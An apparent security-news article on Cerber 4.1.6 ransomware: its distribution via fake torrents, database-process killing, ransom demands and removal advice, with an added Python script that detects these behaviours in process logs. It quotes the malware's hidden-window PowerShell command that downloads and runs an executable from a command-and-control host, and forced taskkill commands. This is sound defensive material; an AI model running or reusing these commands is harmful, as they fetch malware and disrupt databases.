Cerber 4.1.6 Ransomware - Remove Virus and Restore Encrypted Files - How to, Technology and PC Security Forum | SensorsTechForum.com



And just when we thought the variants of Cerber's 4th version were over, the main competitor of Locky ransomware has surprised us with a 4.1.6 iteration. The version does not include major improvements, but it features a new wallpaper and new distribution websites. Another change in this version is that Cerber 4.1.6 is now more focused on encrypting databases, because of their higher importance to organizations in case an enterprise computer is infected. After the 4.1.6 version of Cerber ransomware infects a computer, the virus immediately encrypts the files using a strong encryption algorithm. This is done to drive users to a web page promoting a Cerber decryptor, sold for a payment in Bitcoin in return for the decryption keys, which are generated uniquely for each infection. In case you have become a victim of this new form of online extortion, we advise you to be very cautious in your next moves and to read this article.

Threat Summary

Name: Cerber 4.1.6
Short Description: The malware encrypts users' files using a strong encryption algorithm, making direct decryption possible only via a unique decryption key held by the cyber-criminals.
Symptoms: The user may see ransom notes and "instructions" linking to a web page and a decryptor. File names are changed and a random file extension is appended.
Distribution Method: Via an exploit kit, a malicious DLL, malicious JavaScript, or a drive-by download of the obfuscated malware itself.

Cerber 4.1.6 – What Is New

New Infection Strategy

When we look at version 4 of Cerber ransomware, most of its sub-versions (4.1.0, 4.1.1, 4.1.3, 4.1.4, 4.1.5) used e-mail spam and malicious URLs posted on websites and elsewhere to distribute the malware and infect unsuspecting users. The 4.1.6 iteration of Cerber, however, may have taken a different approach to infection, combining all of these distribution techniques. Below, from the first Cerber 4.1.6 detections, is a sample that poses as a portable Firefox web browser executable:


This strategy is very clever, and torrent sites may be used to distribute it. Hackers go as far as hijacking the accounts of trusted (five-star) uploaders on torrent websites to upload torrents that only pretend to be legitimate software but may in fact deliver 4.1.6 as well as other versions of Cerber. This is because Cerber is operated as RaaS (Ransomware as a Service), so many different individuals distribute the ransomware via different kinds of spam campaigns.

Cerber 4.1.6 Now More Focused on Databases

Since databases are very important to organizations, researchers recently reported that Cerber is focused on attacking more and more kinds of database. The primary reason is that the cyber-criminals make more profit by encrypting files of higher importance. In addition, the 4.1.6 version may execute a batch (.bat) file that immediately closes the database process if it is running, so that the database files, which a running server keeps open and locked, can be encrypted. Here are some examples, provided by Microsoft, of the taskkill command's uses that Cerber 4.1.6 may employ:

→ taskkill /pid 1230 /pid 1241 /pid 1253
taskkill /f /fi "USERNAME eq NT AUTHORITY\SYSTEM" /im notepad.exe
taskkill /s srvmain /f /im notepad.exe
taskkill /s srvmain /u maindom\hiropln /p p@ssW23 /fi "IMAGENAME eq note*" /im *
taskkill /s srvmain /u maindom\hiropln /fi "USERNAME ne NT*" /im *
taskkill /f /fi "PID ge 1000" /im *

Further research also suggests that the 4.1.6 iteration of Cerber may target the following types of databases:

  • Microsoft Access.
  • Oracle.
  • MySQL.

Unlike other ransomware viruses, which primarily target pictures, documents, videos and audio files, the Cerber family now focuses heavily on databases as well.

How Does Cerber 4.1.6 Work

Like the other versions of the ransomware, once its malicious file has been executed on the user's computer, it uses obfuscation to avoid detection by antivirus programs. One observed technique is a PowerShell command, run with a hidden window, that silently downloads and starts a malicious executable, most likely placed in the %AppData% directory:

→ PS C:\Users\{Username}> POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile('http://{malicious cerber c2 ip}/~trevor/winx64.exe',"$env:APPDATA\winx64.exe");Start-Process ("$env:APPDATA\winx64.exe")
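Both behaviours described above, the forced taskkill of database processes from a batch file and the hidden-window PowerShell download cradle, leave a distinctive trail in process-creation telemetry. The following Python script is an added example written for this article, not code from the original page or from the Cerber operators: it runs two detection rules over a handful of constructed process-creation records in Sysmon Event ID 1 field order (Image|ParentImage|CommandLine). The database image names (mysqld.exe, oracle.exe, msaccess.exe), the file names and paths, and the C2 address 203.0.113.10 are assumptions chosen for the demonstration.

```python
"""Added example: two detection rules for the Cerber 4.1.6 behaviours above."""
import re
from fnmatch import fnmatch

# Constructed sample records (hypothetical, not real telemetry), one per line,
# in Sysmon Event ID 1 field order: Image|ParentImage|CommandLine.
# 203.0.113.10 is a documentation address standing in for the redacted C2 host.
SAMPLE_EVENTS = r"""
C:\Windows\System32\cmd.exe|C:\Users\alice\AppData\Roaming\winx64.exe|cmd.exe /c C:\Users\alice\AppData\Roaming\kill.bat
C:\Windows\System32\taskkill.exe|C:\Windows\System32\cmd.exe|taskkill /f /im mysqld.exe /im oracle.exe
C:\Windows\System32\taskkill.exe|C:\Windows\System32\cmd.exe|taskkill /f /fi "IMAGENAME eq msacc*" /im *
C:\Windows\System32\taskkill.exe|C:\Windows\explorer.exe|taskkill /f /im notepad.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\cmd.exe|POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile('http://203.0.113.10/~trevor/winx64.exe',"$env:APPDATA\winx64.exe");Start-Process ("$env:APPDATA\winx64.exe")
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell.exe -File C:\scripts\nightly-backup.ps1
""".strip().splitlines()

# Assumed image names for the database products the article lists
# (MySQL, Oracle, Microsoft Access); extend this set for your own estate.
DB_IMAGES = {"mysqld.exe", "oracle.exe", "msaccess.exe"}

_TOKEN = re.compile(r'"[^"]*"|\S+')
_URL = re.compile(r"""https?://[^\s'"()]+""", re.I)
_DROP = re.compile(r"""DownloadFile\(\s*['"][^'"]+['"]\s*,\s*['"]([^'"]+)['"]""", re.I)


def tokenize(cmdline):
    """Split a Windows command line, dropping the quotes around quoted args."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def taskkill_targets(cmdline):
    """Return (forced, image_patterns) parsed from a taskkill command line.

    Patterns come from every /im argument and from /fi "IMAGENAME eq X"
    filters. When an IMAGENAME filter narrows a bare "/im *", the wildcard is
    dropped so the filter alone describes the target set.
    """
    toks = tokenize(cmdline)
    forced, images, filters = False, [], []
    i = 0
    while i < len(toks):
        t = toks[i].lower()
        if t == "/f":
            forced = True
        elif t == "/im" and i + 1 < len(toks):
            images.append(toks[i + 1].lower())
            i += 1
        elif t == "/fi" and i + 1 < len(toks):
            m = re.match(r"imagename\s+eq\s+(\S+)", toks[i + 1], re.I)
            if m:
                filters.append(m.group(1).lower())
            i += 1
        i += 1
    patterns = images + filters
    if filters and "*" in patterns:
        patterns.remove("*")
    return forced, patterns


def db_kill_finding(event):
    """Rule 1: a forced taskkill whose target patterns cover a database image."""
    image, parent, cmd = event
    if not image.lower().endswith("taskkill.exe"):
        return None
    forced, patterns = taskkill_targets(cmd)
    hit = sorted(db for db in DB_IMAGES if any(fnmatch(db, p) for p in patterns))
    if forced and hit:
        return {"rule": "forced-db-kill", "targets": hit, "parent": parent}
    return None


def cradle_finding(event):
    """Rule 2: hidden-window PowerShell that downloads a file and launches it."""
    image, parent, cmd = event
    if "powershell" not in image.lower():
        return None
    low = cmd.lower()
    hidden = re.search(r"-w\w*\s+hidden", low) is not None  # -w / -window / -windowstyle
    downloads = ".downloadfile(" in low or ".downloadstring(" in low
    launches = re.search(r"start-process|invoke-expression|\biex\b", low) is not None
    if not (hidden and downloads and launches):
        return None
    url, drop = _URL.search(cmd), _DROP.search(cmd)
    return {"rule": "hidden-download-cradle", "parent": parent,
            "url": url.group(0) if url else None,
            "drop": drop.group(1) if drop else None}


def analyse(lines):
    """Run both rules over Image|ParentImage|CommandLine records."""
    findings = []
    for line in lines:
        event = tuple(line.split("|", 2))
        if len(event) != 3:
            continue
        for rule in (db_kill_finding, cradle_finding):
            hit = rule(event)
            if hit:
                hit["cmd"] = event[2]
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f["rule"], "<-", f["parent"])
        print("   ", f["cmd"])
```

Run as a script it prints the three findings from the constructed records; in practice you would feed it exported Sysmon or EDR process-creation events. The taskkill parser honours /f together with the /im and /fi "IMAGENAME eq ..." forms shown in the Microsoft examples above, so a remote "/s srvmain ... /im *" invocation without an IMAGENAME filter is treated as a wildcard over every process. A non-forced kill of a database process is deliberately not flagged, because ordinary maintenance scripts stop services that way; tune that choice to your own baseline.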

After the malicious executable is downloaded and launched, it may tamper with key registry sub-keys and add custom values to them so that the encryption process runs uninterrupted and quietly, and so that Cerber 4.1.6 gains control of the components it needs in order to operate.


After the encryption process has finished, the 4.1.6 version drops a "readme.hta" (HTML Application) ransom note file and changes the wallpaper to the traditional Cerber screen:


The note and the wallpaper both point to the Cerber Decryptor web page, which explains the situation to the victim:


What is different here is that this version of Cerber demands a significantly higher payment than the previous iterations: if $499 USD in BTC is not paid in time, the price for decrypting the files rises to $999.

Cerber 4.1.6 – What to Do If I am Infected

In case you have become an unfortunate victim of this variant of Cerber, we strongly advise you to use the option on the ransom web page to decrypt one file for free:


Since paying the ransom is strongly discouraged, experts advise that you back up the encrypted files to an external drive and, instead of paying, remove the virus using the removal instructions below. Keep the ransom note alongside the encrypted files and leave both untouched, because a future decryptor will typically need them. For maximum effectiveness, we advise removing Cerber automatically with anti-malware software.

After you have removed Cerber, we advise you to try alternative methods of restoring your files, such as those posted in step "2. Restore files encrypted by Cerber 4.1.6" below. They may not be a 100% solution, but they are a good temporary alternative until malware researchers come up with a decryptor, as happened with the first version of Cerber last year. We will update this article with more information and a link to a decryptor as soon as one becomes available, which is why we advise you to check this web page regularly.


Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having also graduated in Marketing, Ventsislav has a passion for discovering new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion in cybersecurity and is a strong believer in basic online-safety education for every user.
